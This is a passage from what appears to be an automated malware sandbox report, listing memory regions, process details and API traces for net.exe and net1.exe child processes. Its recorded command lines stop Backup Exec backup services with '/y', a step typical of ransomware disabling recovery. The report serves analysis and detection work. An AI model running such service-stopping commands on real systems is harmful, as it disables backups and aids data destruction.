"private_0x000000007ffe0000" filename = "" Region: id = 4880 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 4881 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4882 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4883 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 4884 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4885 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 4886 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4887 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4903 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4904 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4905 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4906 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 4907 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4908 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4909 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4910 start_va = 0x7fef8260000 end_va = 0x7fef8271fff entry_point = 0x7fef8260000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4911 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 4912 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4913 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4914 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4915 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4916 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4917 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4918 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4919 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4920 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4921 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4922 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 484 os_tid = 0x110c Process: id = "93" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x1f698000" os_pid = "0x111c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop BackupExecDeviceMediaService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4888 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4889 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4890 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4891 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 4892 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4893 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4894 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4895 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 4896 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4897 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4898 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 4899 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4900 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4901 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4902 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 486 os_tid = 0x1120 Process: id = "94" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6eb0d000" os_pid = "0x1140" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "92" os_parent_pid = "0x1108" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecAgentBrowser /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4923 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4924 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4925 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4926 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4927 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4928 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4929 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4930 start_va = 0xffe70000 end_va = 0xffea2fff entry_point = 0xffe70000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 4931 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4932 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4933 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 4934 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4935 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 4936 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4937 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5029 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5030 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5031 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5032 start_va = 0x280000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 5033 start_va = 0x420000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 5034 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5035 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5036 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 5037 start_va = 0x7fef8260000 end_va = 0x7fef8271fff entry_point = 0x7fef8260000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5038 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 5039 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5040 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5041 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5042 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5043 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5044 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5045 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5046 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5047 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5048 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5049 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5050 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5051 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5052 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 488 os_tid = 0x1144 [0089.511] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf990 | out: lpSystemTimeAsFileTime=0x1cf990*(dwLowDateTime=0xea84b450, dwHighDateTime=0x1d48689)) [0089.511] GetCurrentProcessId () returned 0x1140 [0089.511] GetCurrentThreadId () returned 0x1144 [0089.511] GetTickCount () returned 0x20388 [0089.511] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf998 | out: lpPerformanceCount=0x1cf998*=1813642900000) returned 1 [0089.644] GetModuleHandleW (lpModuleName=0x0) returned 0xffe70000 [0089.644] __set_app_type (_Type=0x1) [0089.644] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe89c9c) returned 0x0 [0089.644] __getmainargs (in: _Argc=0xffe94780, _Argv=0xffe94790, _Env=0xffe94788, _DoWildCard=0, _StartInfo=0xffe9479c | out: _Argc=0xffe94780, _Argv=0xffe94790, _Env=0xffe94788) returned 0 [0089.644] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0089.644] GetConsoleOutputCP () returned 0x1b5 [0089.645] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffe9cec0 | out: lpCPInfo=0xffe9cec0) returned 1 [0089.645] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0089.647] sprintf_s (in: _DstBuf=0x1cf938, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0089.647] setlocale (category=0, locale=".437") returned="English_United States.437" [0089.649] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0089.649] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0089.649] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecAgentBrowser /y" [0089.649] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf6d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0089.649] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0089.649] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cf928 | out: Buffer=0x1cf928*=0x334d60) returned 0x0 [0089.649] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cf928 | out: Buffer=0x1cf928*=0x33c130) returned 0x0 [0089.649] _fileno (_File=0x7fefdba2a80) returned 0 [0089.649] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0089.649] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0089.649] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0089.649] _wcsicmp (_String1="config", _String2="stop") returned -16 [0089.649] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0089.649] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0089.649] _wcsicmp (_String1="file", _String2="stop") returned -13 [0089.650] _wcsicmp (_String1="files", _String2="stop") returned -13 [0089.650] _wcsicmp (_String1="group", _String2="stop") returned -12 [0089.650] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0089.650] _wcsicmp (_String1="help", _String2="stop") returned -11 [0089.650] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0089.650] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0089.650] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0089.650] _wcsicmp (_String1="session", _String2="stop") returned -15 [0089.650] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0089.650] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0089.650] _wcsicmp (_String1="share", _String2="stop") returned -12 [0089.650] _wcsicmp (_String1="start", _String2="stop") returned -14 [0089.650] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0089.650] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0089.650] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0089.650] _wcsicmp (_String1="accounts", _String2="BackupExecAgentBrowser") returned -1 [0089.650] _wcsicmp (_String1="computer", _String2="BackupExecAgentBrowser") returned 1 [0089.650] _wcsicmp (_String1="config", _String2="BackupExecAgentBrowser") returned 1 [0089.650] _wcsicmp (_String1="continue", _String2="BackupExecAgentBrowser") returned 1 [0089.650] _wcsicmp (_String1="cont", _String2="BackupExecAgentBrowser") returned 1 [0089.650] _wcsicmp (_String1="file", _String2="BackupExecAgentBrowser") returned 4 [0089.650] _wcsicmp (_String1="files", _String2="BackupExecAgentBrowser") returned 4 [0089.650] _wcsicmp (_String1="group", _String2="BackupExecAgentBrowser") returned 5 [0089.650] _wcsicmp (_String1="groups", _String2="BackupExecAgentBrowser") returned 5 [0089.650] _wcsicmp (_String1="help", _String2="BackupExecAgentBrowser") returned 6 [0089.650] _wcsicmp (_String1="helpmsg", _String2="BackupExecAgentBrowser") returned 6 [0089.650] _wcsicmp (_String1="localgroup", _String2="BackupExecAgentBrowser") returned 10 [0089.650] _wcsicmp (_String1="pause", _String2="BackupExecAgentBrowser") returned 14 [0089.650] _wcsicmp (_String1="session", _String2="BackupExecAgentBrowser") returned 17 [0089.650] _wcsicmp (_String1="sessions", _String2="BackupExecAgentBrowser") returned 17 [0089.650] _wcsicmp (_String1="sess", _String2="BackupExecAgentBrowser") returned 17 [0089.650] _wcsicmp (_String1="share", _String2="BackupExecAgentBrowser") returned 17 [0089.651] _wcsicmp (_String1="start", _String2="BackupExecAgentBrowser") returned 17 [0089.651] _wcsicmp (_String1="stats", _String2="BackupExecAgentBrowser") returned 17 [0089.651] _wcsicmp (_String1="statistics", _String2="BackupExecAgentBrowser") returned 17 [0089.651] _wcsicmp (_String1="stop", _String2="BackupExecAgentBrowser") returned 17 [0089.651] _wcsicmp (_String1="time", _String2="BackupExecAgentBrowser") returned 18 [0089.651] _wcsicmp (_String1="user", _String2="BackupExecAgentBrowser") returned 19 [0089.651] _wcsicmp (_String1="users", _String2="BackupExecAgentBrowser") returned 19 [0089.651] _wcsicmp (_String1="msg", _String2="BackupExecAgentBrowser") returned 11 [0089.651] _wcsicmp (_String1="messenger", _String2="BackupExecAgentBrowser") returned 11 [0089.651] _wcsicmp (_String1="receiver", _String2="BackupExecAgentBrowser") returned 16 [0089.651] _wcsicmp (_String1="rcv", _String2="BackupExecAgentBrowser") returned 16 [0089.651] _wcsicmp (_String1="netpopup", _String2="BackupExecAgentBrowser") returned 12 [0089.651] _wcsicmp (_String1="redirector", _String2="BackupExecAgentBrowser") returned 16 [0089.651] _wcsicmp (_String1="redir", _String2="BackupExecAgentBrowser") returned 16 [0089.651] _wcsicmp (_String1="rdr", _String2="BackupExecAgentBrowser") returned 16 [0089.651] _wcsicmp (_String1="workstation", _String2="BackupExecAgentBrowser") returned 21 [0089.651] _wcsicmp (_String1="work", _String2="BackupExecAgentBrowser") returned 21 [0089.651] _wcsicmp (_String1="wksta", _String2="BackupExecAgentBrowser") returned 21 [0089.651] _wcsicmp (_String1="prdr", _String2="BackupExecAgentBrowser") returned 14 [0089.651] _wcsicmp (_String1="devrdr", _String2="BackupExecAgentBrowser") returned 2 [0089.651] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecAgentBrowser") returned 10 [0089.651] _wcsicmp (_String1="server", _String2="BackupExecAgentBrowser") returned 17 [0089.651] _wcsicmp (_String1="svr", _String2="BackupExecAgentBrowser") returned 17 [0089.651] _wcsicmp (_String1="srv", _String2="BackupExecAgentBrowser") returned 17 [0089.651] _wcsicmp (_String1="lanmanserver", _String2="BackupExecAgentBrowser") returned 10 [0089.651] _wcsicmp (_String1="alerter", _String2="BackupExecAgentBrowser") returned -1 [0089.651] _wcsicmp (_String1="netlogon", _String2="BackupExecAgentBrowser") returned 12 [0089.651] _wcsupr (in: _String="BackupExecAgentBrowser" | out: _String="BACKUPEXECAGENTBROWSER") returned="BACKUPEXECAGENTBROWSER" [0089.652] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x33ce40 [0089.656] GetServiceKeyNameW (in: hSCManager=0x33ce40, lpDisplayName="BACKUPEXECAGENTBROWSER", lpServiceName=0xffe95750, lpcchBuffer=0x1cf848 | out: lpServiceName="", lpcchBuffer=0x1cf848) returned 0 [0089.657] _wcsicmp (_String1="msg", _String2="BACKUPEXECAGENTBROWSER") returned 11 [0089.657] _wcsicmp (_String1="messenger", _String2="BACKUPEXECAGENTBROWSER") returned 11 [0089.657] _wcsicmp (_String1="receiver", _String2="BACKUPEXECAGENTBROWSER") returned 16 [0089.657] _wcsicmp (_String1="rcv", _String2="BACKUPEXECAGENTBROWSER") returned 16 [0089.657] _wcsicmp (_String1="redirector", _String2="BACKUPEXECAGENTBROWSER") returned 16 [0089.657] _wcsicmp (_String1="redir", _String2="BACKUPEXECAGENTBROWSER") returned 16 [0089.657] _wcsicmp (_String1="rdr", _String2="BACKUPEXECAGENTBROWSER") returned 16 [0089.657] _wcsicmp (_String1="workstation", _String2="BACKUPEXECAGENTBROWSER") returned 21 [0089.657] _wcsicmp (_String1="work", _String2="BACKUPEXECAGENTBROWSER") returned 21 [0089.657] _wcsicmp (_String1="wksta", _String2="BACKUPEXECAGENTBROWSER") returned 21 [0089.657] _wcsicmp (_String1="prdr", _String2="BACKUPEXECAGENTBROWSER") returned 14 [0089.657] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECAGENTBROWSER") returned 2 [0089.657] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECAGENTBROWSER") returned 10 [0089.657] _wcsicmp (_String1="server", _String2="BACKUPEXECAGENTBROWSER") returned 17 [0089.657] _wcsicmp (_String1="svr", _String2="BACKUPEXECAGENTBROWSER") returned 17 [0089.657] _wcsicmp (_String1="srv", _String2="BACKUPEXECAGENTBROWSER") returned 17 [0089.657] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECAGENTBROWSER") returned 10 [0089.658] _wcsicmp (_String1="alerter", _String2="BACKUPEXECAGENTBROWSER") returned -1 [0089.658] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECAGENTBROWSER") returned 12 [0089.658] NetServiceControl (in: servername=0x0, service="BACKUPEXECAGENTBROWSER", opcode=0x0, arg=0x0, bufptr=0x1cf850 | out: bufptr=0x1cf850) returned 0x889 [0089.658] wcscpy_s (in: _Destination=0xffe980d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0089.659] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0089.659] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffe95b50, nSize=0x800, Arguments=0xffe97f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0089.661] GetFileType (hFile=0xb) returned 0x2 [0089.661] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf718 | out: lpMode=0x1cf718) returned 1 [0089.662] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe95b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1cf710, lpReserved=0x0 | out: lpBuffer=0xffe95b50*, lpNumberOfCharsWritten=0x1cf710*=0x1e) returned 1 [0089.662] GetFileType (hFile=0xb) returned 0x2 [0089.662] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf718 | out: lpMode=0x1cf718) returned 1 [0089.662] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe71efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf710, lpReserved=0x0 | out: lpBuffer=0xffe71efc*, lpNumberOfCharsWritten=0x1cf710*=0x2) returned 1 [0089.663] _ultow (in: _Dest=0x889, 